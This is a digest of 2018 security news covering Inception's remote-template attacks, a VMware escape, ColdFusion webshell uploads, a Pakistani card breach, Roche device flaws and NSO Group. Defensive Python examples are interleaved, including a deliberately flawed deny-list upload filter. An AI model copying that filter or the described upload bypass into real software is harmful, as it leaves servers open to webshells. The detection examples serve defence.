

"Inception Attackers" Combine Old Exploit and New Backdoor
11.11.2018 securityweek

A malicious group known as the “Inception” attackers has been using a year-old Office exploit and a new backdoor in recent attacks, Palo Alto Networks security researchers warn.

Active since at least 2014, the group has used custom malware against targets spanning various industries worldwide, with a special interest in Russia.

In October 2018, the threat actor was observed hitting various European targets in attacks employing an exploit for a vulnerability (CVE-2017-11882) that Microsoft patched in November 2017. Furthermore, the hackers were using a new PowerShell backdoor dubbed POWERSHOWER, which shows a high attention to detail in cleaning up after infection.

As part of the observed attacks, the actor has been using a single malicious document and a remote template to deliver their malicious payload. The use of a template was associated with the group before, but previous attacks revealed the use of two documents, including an initial spear-phish for reconnaissance.

Microsoft Word allows for the loading of templates that are hosted externally, either on a file share, or on the Internet. The template is loaded as soon as the document is opened and hackers have been known to abuse the feature in malicious ways.

The Inception attackers have been using remote templates in their campaigns for the past 4 years, leveraging the various benefits the method provides, such as the fact that the initial document does not contain an explicitly malicious object.

The attack technique also gives the attacker the option to deploy malicious content to the victim based on the initial data received from the target. It also keeps the malicious code out of the hands of researchers who analyze the document after the hosting server has been taken down, since the document alone then contains nothing to analyze.

The malicious document used in the recent attacks displays decoy content and attempts to fetch the remote content over HTTP. In one attack, the malicious template contained exploits for CVE-2012-1856 and CVE-2017-11882.
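The remote-template mechanism described above leaves a fixed footprint inside the document itself: Word records the link to an attached template as a relationship in word/_rels/settings.xml.rels, and an external relationship whose Target is a web URL or a UNC path is what causes the fetch at open time. The following added example (not Palo Alto Networks' code, nor anything recovered from the Inception documents) extracts those targets from a .docx; the sample document it builds is constructed in memory and the URL in it is a placeholder.

```python
"""Flag Word documents that load an attached template from a remote location.

Added example; it is not Palo Alto Networks' or the Inception group's code.
Word stores the attached-template link as a relationship in
word/_rels/settings.xml.rels; a TargetMode="External" relationship whose
Target is an http(s) URL or a UNC path makes Word fetch it at open time,
which is the remote-template technique described above. The .docx built
below is constructed in memory, and the URL in it is a placeholder.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"
REMOTE_PREFIXES = ("http://", "https://", "\\\\")  # web URLs and UNC shares


def remote_template_targets(docx_bytes):
    """Return the Target of every attachedTemplate relationship that points
    off-box. A .dotm under the user's profile (file:///C:/...) is the normal
    case and is not reported; only web and UNC targets are."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return hits  # no attached template at all
        root = ET.fromstring(zf.read(SETTINGS_RELS))
        for rel in root.iter("{%s}Relationship" % REL_NS):
            if rel.get("Type") != ATTACHED_TEMPLATE:
                continue
            # Internal targets live inside the package and cannot reach out.
            if rel.get("TargetMode", "Internal") != "External":
                continue
            target = rel.get("Target", "")
            if target.lower().startswith(REMOTE_PREFIXES):
                hits.append(target)
    return hits


def build_docx(template_target=None):
    """Construct a minimal .docx; with a target, attach it as an external template."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0" encoding="UTF-8"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body/></w:document>')
        rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="%s">' % REL_NS
        if template_target is not None:
            rels += ('<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
                     % (ATTACHED_TEMPLATE, template_target))
        rels += "</Relationships>"
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("clean", build_docx()),
                       ("local template", build_docx("file:///C:/Users/u/Templates/Normal.dotm")),
                       ("remote template", build_docx("http://template.example.invalid/r.dotm"))):
        print(label, "->", remote_template_targets(doc) or "no remote template")
```

A hit is not proof of malice (corporate templates are sometimes served from a file share), but a document that arrived by e-mail and reaches out to an Internet host on open is worth detonating before it is opened on a user's machine. The same check applies to .dotm/.docm containers, which use the same package layout.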

The payload in these attacks is POWERSHOWER, a simple PowerShell backdoor that acts as an initial reconnaissance foothold and also supports the download and execution of a secondary payload that includes a more complete set of features.

This also ensures that the more sophisticated and complex malware the attackers might have in their portfolio remains hidden from investigators. POWERSHOWER can also clean up a significant amount of forensic evidence from the dropper process, including files and registry keys.

VMware Patches VM Escape Flaw Disclosed at Chinese Hacking Contest
11.11.2018 securityweek

VMware informed customers on Friday that patches are available for a critical virtual machine (VM) escape vulnerability disclosed recently by a researcher at the GeekPwn2018 hacking competition.

Organized by the security team of Chinese company Keen Cloud Tech, GeekPwn is a hacking competition that in past years has led to the discovery of many important vulnerabilities. The competition has been held in China since 2014, and since 2017 there has also been an event in the United States.

GeekPwn2018 took place in Shanghai, China, on October 24-25, and its initial prize pool was $800,000.

One of the most interesting entries in the contest came from a researcher at China-based security firm Chaitin Tech, who discovered a guest-to-host escape vulnerability affecting several VMware products. He also identified a less severe information disclosure bug.

Shortly after the VM escape exploit was demonstrated, Chaitin Tech wrote on Twitter that it was the first time anybody managed to escape VMware ESXi and get a root shell on the host system. The company posted a short video showing the exploit in action.

VMware on Tuesday informed customers that it had been provided the details of the vulnerabilities and on Friday it published an advisory describing the flaws and available patches.

According to the virtualization giant, the vulnerabilities, tracked as CVE-2018-6981 and CVE-2018-6982, are caused by an uninitialized stack memory usage bug in the vmxnet3 virtual network adapter.

CVE-2018-6981 affects ESXi, Fusion and Workstation products, and it can allow a guest to execute arbitrary code on the host, while CVE-2018-6982, which only impacts ESXi, can result in an information leak from the host to the guest. VMware pointed out that the vulnerabilities are only present if the vmxnet3 adapter is enabled – other adapters are not impacted.
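Since the advisory ties both bugs to the vmxnet3 device, the first thing a virtualization team wants is a list of which VMs actually present one. The following added example (not VMware tooling) reads the flat key = "value" format of .vmx files and reports the ethernetN adapters that are present and configured as vmxnet3; the .vmx fragments and VM names are constructed.

```python
"""List VMs whose .vmx exposes a vmxnet3 adapter (added example).

This is not VMware's tooling; it is a stand-alone check for the condition
the advisory spells out above (the bugs are reachable only through vmxnet3).
The .vmx format is a flat list of key = "value" lines; the samples below are
constructed, and the VM names are placeholders.
"""
import re

VMX_LINE = re.compile(r'^\s*([A-Za-z0-9_.:]+)\s*=\s*"(.*)"\s*$')


def parse_vmx(text):
    """Parse .vmx text into a dict; comment and malformed lines are skipped."""
    cfg = {}
    for line in text.splitlines():
        m = VMX_LINE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def vmxnet3_adapters(cfg):
    """Return the ethernetN devices that are present and use virtualDev vmxnet3.
    A missing ethernetN.present is treated as TRUE so the check errs toward
    reporting an adapter rather than missing one."""
    hits = []
    for key, val in cfg.items():
        if not (key.startswith("ethernet") and key.endswith(".virtualDev")):
            continue
        dev = key[: -len(".virtualDev")]
        present = cfg.get(dev + ".present", "TRUE").strip().upper() == "TRUE"
        if present and val.strip().lower() == "vmxnet3":
            hits.append(dev)
    return sorted(hits)


def audit(vmx_files):
    """Map VM name -> vmxnet3 devices, for every VM that has at least one."""
    report = {}
    for name, text in vmx_files.items():
        devs = vmxnet3_adapters(parse_vmx(text))
        if devs:
            report[name] = devs
    return report


SAMPLE_VMX = {  # constructed .vmx fragments, not a real inventory
    "web01": "\n".join([
        '.encoding = "UTF-8"',
        'displayName = "web01"',
        'ethernet0.present = "TRUE"',
        'ethernet0.virtualDev = "e1000"',
        'ethernet1.present = "TRUE"',
        'ethernet1.virtualDev = "vmxnet3"',
    ]),
    "db01": "\n".join([
        'displayName = "db01"',
        'ethernet0.present = "TRUE"',
        'ethernet0.virtualDev = "e1000e"',
        'ethernet1.present = "FALSE"',       # disabled adapter: not exposed
        'ethernet1.virtualDev = "vmxnet3"',
    ]),
}

if __name__ == "__main__":
    for vm, devs in audit(SAMPLE_VMX).items():
        print(vm, "exposes vmxnet3 on", ", ".join(devs))
```

Swapping adapters is a workaround, not a fix: the affected guest still runs on an unpatched host, so the list is for sequencing the patch rollout (internet-facing or multi-tenant hosts first), not for avoiding it.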

VMware has released patches and updates for both vulnerabilities.

It’s worth noting that Chaitin Tech researchers have also earned significant prizes at ZDI’s Pwn2Own hacking competition in the past years. It’s unclear how much they earned for the VMware product vulnerabilities disclosed at GeekPwn.

Data from ‘almost all’ Pakistani banks stolen, Pakistani debit card details surface on the dark web
11.11.2018 securityaffairs

According to the head of the Federal Investigation Agency’s (FIA) cybercrime wing, almost all Pakistani banks were affected by a recent security breach.
Almost all Pakistani banks were affected by a recent security breach, the shocking news was confirmed by the head of the Federal Investigation Agency’s (FIA) cybercrime wing.

“According to a recent report we have received, data from almost all Pakistani banks has been reportedly hacked,” FIA Cybercrimes Director retired Capt Mohammad Shoaib told Geo News on Tuesday.

The comment from Capt Mohammad Shoaib follows the discovery by cyber security firm Group-IB of a fresh dump of Pakistani credit and debit cards on dark web forums.

The agency is currently investigating more than 100 cases in connection with the security breach.

“More than 100 cases [of cyber-attack] have been registered with the FIA and are under investigation. We have made several arrests in the case, including that of an international gang [last month],” Capt Shoaib said.

The trove of data that surfaced on the dark web includes details of some 20,000 Pakistani debit cards, belonging to customers of “most of the banks” operating in the country.

In an interview with DawnNewsTV, Shoaib explained that hackers based outside Pakistan have compromised the infrastructure of several Pakistani banks.

“The hackers have stolen large amounts of money from people’s accounts,” he added.

“The recent attack on banks has made it quite clear that there is a need for improvement in the security system of our banks,”

The FIA notified all banks in the country of its findings and called a meeting with their representatives to respond to the incident, limit the damage and improve the overall security of Pakistani banks.

“Banks are the custodians of the money people have stored in them,” Shoaib said. “They are also responsible if their security features are so weak that they result in pilferage.”

At this time it is not clear when the security breach took place or how the attackers gained access to the systems of the Pakistani banks.

“An element of banking fraud which is a cause of concern is that banks hide the theft [that involves them]… and the clients report [the theft] to the banks and not to us, resulting in a loss of people’s money,” he told DawnNewsTV.

“We are trying to play a proactive role in preventing bank pilferage,”

Pakistani banks are facing a severe emergency: last week a cyber attack on Bank Islami allowed attackers to steal at least Rs2.6 million from its accounts.

By the end of last week, some Pakistani banks had suspended usage of their debit cards outside the country and blocked all international transactions on their cards.

A large Pakistani bank informed its clients that online mobile banking services would be temporarily suspended starting from November 3.

Pakistan Computer Emergency Response Team (PakCERT) released a report that details the timeline and scale of data leaks. Experts at PakCERT believe that the data was obtained through card skimming.

According to the report, the first dump, named “PAKISTANWORLD-EU-MIX-01,” was offered for sale on the JokerStash site. It contained over 11,000 records, of which more than 8,000 related to at least nine Pakistani banks.

These cards were offered for sale in the cybercrime underground for $100 up to $160.

Flaws in Roche Medical Devices Can Put Patients at Risk
10.11.2018 securityweek
ICS  Vulnerability

Vulnerabilities discovered in several medical devices made by the diagnostics division of Swiss-based healthcare company Roche can put patients at risk, a cybersecurity firm has warned.

Researchers at Medigate, a company specializing in securing connected medical devices, identified five vulnerabilities in three types of products from Roche. The flaws impact Accu-Chek glucose testing devices, CoaguChek devices used by healthcare professionals in anticoagulation therapy, and Cobas portable point-of-care systems.

A detailed list of vulnerable products and versions is available in an advisory published recently by ICS-CERT. It’s worth noting that each vulnerability impacts certain models and versions of the Roche devices.

The affected products consist of a base unit and a handheld device that communicates wirelessly – including over Wi-Fi if an optional module is available – with the base unit. Medigate researchers discovered that an attacker with access to the local network can hack the base station and from there target the handheld devices.

The flaws, with CVSSv3 scores ranging between 6.5 and 8.3, can be exploited by a network attacker to bypass authentication to an advanced interface, execute code on the device using specific medical protocols, and place arbitrary files on the filesystem.

One of the command execution flaws requires authentication, but the ICS-CERT advisory shows that the affected products use weak access credentials, which suggests that it may be easy for an attacker to authenticate on the system.

“The vulnerabilities are easy to exploit once known, but are very hard to discover and research,” Medigate told SecurityWeek.

According to the company, the vulnerabilities can pose a threat to patients using the impacted devices.

“These vulnerabilities allow complete control of the base station and hand-held device including all generated network traffic. This means the medical protocol used by the device can be altered and the medical data can be changed. In the case of a blood glucose meter, this can put a patient at risk. If the device is altered, it could affect the readings or data transfer which could lead to incorrect treatment,” the company explained.

According to ICS-CERT, Roche is preparing patches for the vulnerabilities found by Medigate and they should be available sometime this month. In the meantime, the company has advised customers to restrict network and physical access to affected devices, protect connected endpoints from malicious software and unauthorized access, and monitor the network for suspicious activity.

ForeScout Acquires Industrial Security Firm SecurityMatters for $113 Million in Cash
10.11.2018 securityweek

Network access security firm ForeScout Technologies (NASDAQ:FSCT) announced on Thursday that it has acquired operational technology (OT) network security firm SecurityMatters for approximately $113 million in cash.

The acquisition will help ForeScout provide deeper visibility into OT networks to help industrial firms mitigate threats and segment IT and OT environments, the company said.

Founded in 2009 by Damiano Bolzoni, Sandro Etalle and Emmanuele Zambon, SecurityMatters provides organizations with device visibility, continuous network monitoring, and threat and anomaly detection for industrial environments using passive network monitoring that doesn’t impact operations.

The two companies announced a technology integration partnership earlier this year.

ForeScout’s CounterACT visibility platform, combined with SecurityMatters’ technology, enables agentless device discovery, classification and assessment for a wide variety of devices across IT and OT infrastructure.

ForeScout has more than 2,900 customers in over 80 countries that use its solutions, which help accelerate incident response, automate workflows and optimize existing security investments.

Late last month ForeScout launched a partnership with industrial networking and security firm Belden.

Adobe ColdFusion Vulnerability Exploited in the Wild
10.11.2018 securityweek

A recently patched remote code execution vulnerability affecting the Adobe ColdFusion web application development platform has been exploited in the wild by one or more threat groups, Volexity warned on Thursday.

The security hole in question is tracked as CVE-2018-15961 and it was resolved by Adobe in September with its Patch Tuesday updates. The vendor described the vulnerability as a critical unrestricted file upload bug that allows arbitrary code execution. This was one of the five flaws reported to Adobe by Pete Freitag of Foundeo.

The updates were initially assigned a priority rating of “2,” which indicates that exploitation is less likely. However, Adobe silently updated its advisory in late September after learning that CVE-2018-15961 had been actively exploited and assigned a priority rating of “1” for the ColdFusion 2018 and ColdFusion 2016 updates.

According to Volexity, which specializes in incident response, forensics and threat intelligence, there is no public exploit for the targeted ColdFusion vulnerability. The company says it has spotted what it believes to be a China-based APT group exploiting the flaw to upload an old webshell known as China Chopper to a vulnerable server.

The compromised web server had all ColdFusion updates installed, except for the one patching CVE-2018-15961. The attack took place roughly two weeks after Adobe released the fixes, the security firm said.

Volexity’s analysis showed that the vulnerability was introduced when Adobe decided to replace the older FCKeditor WYSIWYG editor with the newer CKEditor. The security bug is said to be similar to a ColdFusion flaw patched back in 2009.

Exploitation of the vulnerability is not difficult, Volexity noted, as it only requires sending a specially crafted HTTP POST request to the upload.cfm file, which does not require any authentication and is unrestricted.

While CKEditor prevented users from uploading certain types of potentially dangerous files, such as .exe and .php, it still allowed .jsp (JavaServer Pages) files, which can be executed in ColdFusion.

The APT group observed by Volexity exploited this weakness, along with a bug that allowed them to change the destination directory, to upload the webshell.
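The two weaknesses described above, a deny-list that forgot .jsp and a destination directory the caller could influence, are the classic upload-handler failures. The following added example (not Adobe's, CKEditor's or Volexity's code) puts the vulnerable filter shape next to the hardened one and adds the hunt an incident responder would run on a suspect server: walk the upload tree for server-executable files and record their modification times, which is what let Volexity date the earlier intrusions. The directory it creates is a constructed stand-in, not a real ColdFusion path.

```python
"""Upload-extension filtering two ways, plus a hunt for dropped server-side files.

Added example; not Adobe's, CKEditor's or Volexity's code. deny_list_allows()
reproduces the shape of the behaviour described above (block .exe and .php,
but let .jsp through); allow_list_allows() is the hardened shape. The
directory created by demo_tree() is a constructed stand-in for an upload
folder, not a real ColdFusion path.
"""
import os
import tempfile
from pathlib import PurePosixPath

DENY = {".exe", ".php", ".php3", ".phtml", ".asp", ".aspx"}
ALLOW = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}
# Extensions the surrounding app server will execute if they land under the web root.
SERVER_SIDE = {".jsp", ".jspx", ".jspf", ".cfm", ".cfc", ".cfml"}


def deny_list_allows(filename):
    """Vulnerable shape: anything not explicitly denied is accepted,
    so an extension the author forgot (.jsp here) goes straight through."""
    return PurePosixPath(filename).suffix.lower() not in DENY


def allow_list_allows(filename):
    """Hardened shape: a bare file name (no directory part, so a caller
    cannot steer the destination) with one of a few known-safe suffixes."""
    if not filename or filename in (".", "..") or "\\" in filename or "\x00" in filename:
        return False
    name = PurePosixPath(filename)
    if name.name != filename:      # rejects "../x.png" and "dir/x.png"
        return False
    return name.suffix.lower() in ALLOW


def hunt_server_side_files(root):
    """Walk an upload tree and return (relative path, mtime) for files the
    server would execute; the mtimes are what date an intrusion."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if PurePosixPath(f).suffix.lower() in SERVER_SIDE:
                full = os.path.join(dirpath, f)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits.append((rel, int(os.path.getmtime(full))))
    return sorted(hits)


def demo_tree():
    """Construct a throwaway upload folder holding one image and one planted .jsp."""
    root = tempfile.mkdtemp(prefix="uploads_")
    os.makedirs(os.path.join(root, "images"))
    for rel in ("images/logo.png", "images/cmd.jsp"):
        with open(os.path.join(root, *rel.split("/")), "w") as fh:
            fh.write("placeholder\n")
    return root


if __name__ == "__main__":
    for name in ("cmd.jsp", "cmd.php", "../../wwwroot/cmd.jsp", "photo.JPG"):
        print("%-24s deny-list: %-5s allow-list: %s"
              % (name, deny_list_allows(name), allow_list_allows(name)))
    for rel, mtime in hunt_server_side_files(demo_tree()):
        print("server-side file under upload root:", rel, "mtime", mtime)
```

The extension check is only the first layer: a hardened handler also stores uploads outside the web root under a server-generated name, so that even a file that slips past the filter cannot be requested and executed. On the hunting side, a .jsp under an image-upload directory is almost never legitimate and its mtime, together with the web server's access log for that path, is the fastest way to bound when the shell was planted and who has used it.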

After spotting this attack, the company’s researchers started analyzing publicly accessible ColdFusion servers and found many systems that appeared to have been compromised, including ones belonging to government, educational, healthcare, and humanitarian aid organizations. Many of the hacked sites had been defaced or showed attempts to upload a webshell.

While the researchers could not confirm that all attacks exploited CVE-2018-15961, there is some indication that a non-APT threat group may have discovered the flaw months before Adobe released a patch in September, as some of the attackers’ files had been last modified in early June.

Some of the targeted websites included defaced index files that attributed the attack to AnoaGhost, a hacktivist group said to be based in Indonesia and which appears to have ties to pro-ISIS hacker gangs.

Prioritizing Flaws Based on Severity Increasingly Ineffective: Study
10.11.2018 securityweek

The large number of vulnerabilities found every year has made it increasingly difficult for organizations to effectively prioritize the security holes exposing their applications and networks, according to a new report published on Wednesday by Tenable.

The company, which helps organizations reduce their cyber risk, has conducted a detailed analysis of the flaws discovered last year and in the first half of 2018.

Tenable has counted all the common vulnerabilities and exposures (CVE) identifiers assigned last year and determined that there were 15,038 new flaws discovered, compared to 9,837 in 2016, which represents an increase of more than 50%. There has been an increase of 27% in the number of vulnerabilities disclosed in the first half of 2018 compared to the same period of 2017, and the security firm estimates that this year the count could reach 18,000-19,000.

In 2017, over half of the vulnerabilities were rated “critical” or “high severity” (CVSSv3 tends to assign higher scores than CVSSv2 did). However, exploits were only made public for 7% of the total, and only a small subset of those were actually weaponized and exploited by malicious actors.

Disclosed CVEs and exploitability by year

According to Tenable, enterprises find, on average, 870 unique vulnerabilities per day, including newly discovered flaws and unpatched issues that were disclosed previously. Of all the vulnerabilities discovered so far, roughly 12% have been rated “critical,” which means organizations have to deal with roughly 100 weaknesses per day even if they prioritize only the most serious findings.

“Trying to remediate and mitigate all disclosed vulnerabilities, even when prioritizing High and Critical vulnerabilities, is an exercise in futility, as our data shows,” Tenable said in its report.

“Managing vulnerabilities at volume and scale across different teams requires actionable intelligence. Otherwise, we’re not making informed decisions – we’re guessing. An intelligence deficit in vulnerability management is causing real-world implications – with 34 percent of breached organizations stating they were aware of the vulnerability that led to their breach before it happened,” it added.
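What the report calls operationalizing intelligence comes down to ordering the queue by something other than the CVSS number. The following added example (not Tenable's code) ranks findings by combining published severity with exploit status and asset exposure, so that a 7.5 being exploited in the wild on an Internet-facing system outranks a 9.8 with no exploit on an isolated box. The weights, the 1..3 criticality scale and the findings themselves are constructed for illustration.

```python
"""Risk-based ordering of findings, as an added example (not Tenable's code).

The page's point is that CVSS severity alone does not tell a team what to fix
first, because only a small share of flaws ever gets a working exploit. The
ranker below combines CVSS with exploit status and asset exposure. The
weights and the 1..3 criticality scale are assumptions chosen for
illustration, and the findings are constructed, not real CVEs.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    ident: str
    cvss: float             # CVSSv3 base score as published
    exploit_public: bool    # a public PoC exists
    exploited_in_wild: bool
    internet_facing: bool
    asset_criticality: int  # 1 = low, 3 = business critical (assumed scale)


def priority(f):
    """Higher means fix sooner. Exploit evidence and exposure outweigh raw severity."""
    score = f.cvss
    if f.exploited_in_wild:
        score += 6.0
    elif f.exploit_public:
        score += 3.0
    if f.internet_facing:
        score += 2.0
    score += 1.5 * (f.asset_criticality - 1)
    return round(score, 1)


def rank(findings):
    """Stable ordering: by priority, then CVSS, then identifier."""
    return sorted(findings, key=lambda f: (-priority(f), -f.cvss, f.ident))


def todays_work(findings, capacity):
    """Split into what fits into today's remediation capacity and the backlog."""
    ordered = rank(findings)
    return ordered[:capacity], ordered[capacity:]


SAMPLE = [  # constructed findings, not real CVEs
    Finding("A", 9.8, exploit_public=False, exploited_in_wild=False,
            internet_facing=False, asset_criticality=1),
    Finding("B", 7.5, exploit_public=True, exploited_in_wild=True,
            internet_facing=True, asset_criticality=3),
    Finding("C", 8.1, exploit_public=True, exploited_in_wild=False,
            internet_facing=False, asset_criticality=2),
    Finding("D", 5.3, exploit_public=False, exploited_in_wild=False,
            internet_facing=True, asset_criticality=2),
]

if __name__ == "__main__":
    now, later = todays_work(SAMPLE, capacity=2)
    print("fix today:", [(f.ident, priority(f)) for f in now])
    print("backlog:  ", [(f.ident, priority(f)) for f in later])
```

The numbers matter less than the shape: exploit evidence and exposure are inputs a team can actually collect (from exploit databases, threat feeds and its own asset inventory), and once they are in the ranking the 870-a-day figure above stops being the work queue and becomes the raw feed it is.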

The company has found that roughly a quarter of all 107,000 CVEs assigned until October 2018 impact enterprise environments and nearly two-thirds of the vulnerabilities found by enterprises are “high severity” or “critical.”

The security holes most commonly found in enterprises impact software from Microsoft, Google, Oracle, and Adobe, including the .NET Framework, Chrome, Java, Internet Explorer, Flash Player and Outlook. More than a quarter of enterprises are also exposed to attacks due to issues related to SSL.

“The problem is we have too much information and not enough intelligence. Turning information into intelligence requires interpretation and analysis – something that doesn’t scale easily. The solution lies in operationalizing intelligence based on your organization’s unique characteristics – your most critical digital assets and vulnerabilities,” Tenable said.

The complete Tenable Vulnerability Intelligence Report is available on the company’s website in PDF format.

Entrust Datacard Acquires Spanish Firm Safelayer
10.11.2018 securityweek

Minneapolis-based identity firm Entrust Datacard has acquired Barcelona, Spain firm Safelayer Secure Communications. Financial details have not been disclosed.

Against a background of increasing digitization of both commerce and government, Entrust Datacard provides trusted identity and secure transaction technologies. Safelayer complements this with software for public key infrastructure (PKI) solutions, multifactor authentication systems, electronic signature, encryption and secure transactions, and for generating trust services in telematic networks such as the Internet and mobile networks.

The two key reasons for the acquisition appear to be geographic expansion (Safelayer is particularly strong in the EU and Latin America); and Safelayer's eIDAS competencies.

On the former, Anudeep Parhar, CIO at Entrust Datacard, commented, "At Entrust Datacard we are committed to being the industry leader in certificate-based security solutions across the regions we serve. As such, we look forward to bringing Safelayer's established PKI and Electronic Trust Services in EMEA and Latin America into our portfolio."

On the latter, he said, "The strong and talented team at Safelayer, coupled with their digital signature solution and eIDAS competencies, enhances our team and further establishes our commitment to accredited trust services across these regions and globally."

eIDAS, standing for 'electronic identification and trust services', is an EU Regulation that came into force in July 2016. As a Regulation it is required law in all EU member states. Its purpose is to enhance trust in electronic transactions between businesses, citizens and public authorities by providing a common legal framework for the cross-border recognition of electronic ID and consistent rules on trust services across the EU.

It provides a framework that allows EU citizens to use electronic ID to access public services in other member states; and establishes requirements for trust services and how trust service providers can gain qualified status.

In 2016, Safelayer became a founding member of the Cloud Signature Consortium. Its purpose is to develop a new standard for cloud-based digital signatures that will meet the requirements of eIDAS -- a standard that it expects to have a global impact.

In addition to market expansion opportunities, says Entrust Datacard in announcing the acquisition, it "also provides Entrust Datacard with Safelayer's best-in-class eIDAS-compliant digital signature technology. The digital signing solution is a comprehensive platform for eIDAS trust services that combines authentication, single sign on (SSO) and identity federation; the solution incorporates PKI for implementing electronic signature functions."

Entrust Datacard intends to maintain Safelayer's Spanish offices and existing staff.

This is Entrust Datacard's second security acquisition in under six months. The company made an investment in CensorNet and acquired its SMS Passcode solution in July 2018.

Snowden speaks about the role of surveillance firm NSO Group in Khashoggi murder
9.11.2018 securityaffairs

Snowden warns of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.
The US whistleblower Edward Snowden has denounced the abuse of surveillance software by many governments, and blamed the Israeli company NSO Group for developing and selling such software to Saudi Arabia.

Speaking at a conference in Tel Aviv on Wednesday, Snowden said that the spy software developed by NSO Group enabled the murder of the dissident journalist Jamal Khashoggi.

Snowden claimed that Israeli company NSO Group had sold Saudi Arabia software that was used to compromise the smartphone of one of Khashoggi’s friends.

Officially, sales of such surveillance software are limited to authorized governments, to support agency investigations of criminal organizations and terrorist groups.

Unfortunately, NSO Group’s software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried out with the NSO spyware. Citizen Lab also uncovered attacks against individuals in Qatar and Saudi Arabia, where the Israeli surveillance software is becoming very popular.

Country         Targets      Source                  Year(s)
Panama          Up to 150    Univision               2012-2014
UAE             1            Citizen Lab             2016
Mexico          22           Citizen Lab             2016
Saudi Arabia    2            Amnesty, Citizen Lab    2018
In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the recent discovery demonstrates that the trade in surveillance software is out of control.

Now Snowden claims that the Israeli surveillance firm NSO Group had a primary role in Khashoggi’s murder that is “one of the major stories that’s not being written about.”

“They are the worst of the worst in selling these burglary tools that are being actively, currently used to violate the human rights of dissidents, opposition figures, activists, to some pretty bad players,” Snowden told his audience.

The Snowden Video Interview was published by almasdarnews.com.

Snowden told the audience that the surveillance firms don’t operate “to save lives, but to make money.”

On Oct 1, 2018, Citizen Lab tweeted: “NEW REPORT: The Kingdom Came to Canada: How Saudi-Linked Digital Espionage Reached Canadian Soil https://citizenlab.ca/2018/10/the-kingdom-came-to-canada-how-saudi-linked-digital-espionage-reached-canadian-soil/”

The report’s summary reads: “In this report, we describe how Canadian permanent resident and Saudi dissident Omar Abdulaziz was targeted with a fake package delivery notification. We assess with high confidence that Abdulaziz’s...”

The principal product of the NSO Group is a surveillance software called Pegasus, which allows its operators to spy on the most common mobile devices, including iPhones, Androids, and BlackBerry and Symbian systems.

Pegasus is a perfect tool for surveillance, it is able to steal any kind of data from smartphones and use them to spy on the surrounding environment through their camera and microphone.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person,” The New York Times reported.

Compliance to Cybersecurity Requirements and False Claims Act
9.11.2018 securityaffairs

There’s a growing risk of companies receiving substantial fines for not complying with cybersecurity standards under the False Claims Act.
In particular, an emerging concern for businesses that act as contract-based service providers for government entities is that those establishments could be liable under the False Claims Act (FCA).

What Is the False Claims Act?
The False Claims Act is enforced at the federal level as well as in over two dozen states and the District of Columbia. It stipulates that private citizens can file lawsuits against entities engaging in fraud or dishonesty during certain government transactions.

The citizens that participate in such legal action are called whistleblowers and typically receive between 15 and 25 percent of the recovered amount in a successful suit. Many FCA violations relate to inaccurate billing or falsified information given to government authorities. However, federal contractors can also be held liable for not adhering to the terms of their agreements.

More specifically, the Supreme Court ruled that FCA liability can occur if a government contractor submits a claim for payment for services but does not mention nonadherence to a statutory, regulatory or contractual requirement. The contractor must also know that the shortcoming would affect the government’s decision to pay.

The Link Between the False Claims Act and Cybersecurity
It may not initially be clear how the FCA relates to cybersecurity until people realize that federal contractors must abide by numerous cybersecurity best practices under the Federal Acquisition Regulation (FAR) basic safeguarding rule that took effect June 15, 2016.

The FAR mentions 15 “basic safeguarding requirements” for cybersecurity, including sanitizing or destroying media or devices containing federal contract information at the end of their usage periods and limiting access to information systems so that it encompasses only the actions that authorized users should carry out — not additional privileges.

There’s also the Defense Federal Acquisition Regulation Supplement (DFARS). It relates to contractors working for the Department of Defense (DoD) and dictates how they must handle controlled unclassified information (CUI) by protecting it adequately and reporting breaches promptly.

Parties that did not get in compliance by the end of December 2017 were at risk of losing their contracts or getting stop-work orders. They also had to report how they failed to meet the standards set.

Then, in early 2018, the General Services Administration (GSA) announced plans to officially regulate how federal contractors protect information. Whereas the FAR does not cover cybersecurity breach reporting requirements, the GSA holds contractors responsible for reporting breaches and doing so to the appropriate parties within a defined timeframe.

A Lack of Cybersecurity Best Practices Could Cause Obstacles
The details about the regulations above show how companies that provide services to government entities could be liable under the FCA for not honoring the terms of their contracts — specifically those relating to cybersecurity. Each false claim made that falls within the specifications of the FCA carries a fine of $5,500 to $11,000. The offending party must also pay the whistleblower’s legal fees.

However, even the businesses that don’t experience that consequence of noncompliance could find that a lack of cybersecurity readiness hinders operations.

The DoD proposed taking cybersecurity into account when choosing contractors. Already, the body evaluates cost, schedule and performance. But DoD representatives recognize that contractors are at risk of being infiltrated by cybercriminals, so if contractors don’t take cybersecurity seriously, they could find it difficult to remain competitive during the contract bidding process.

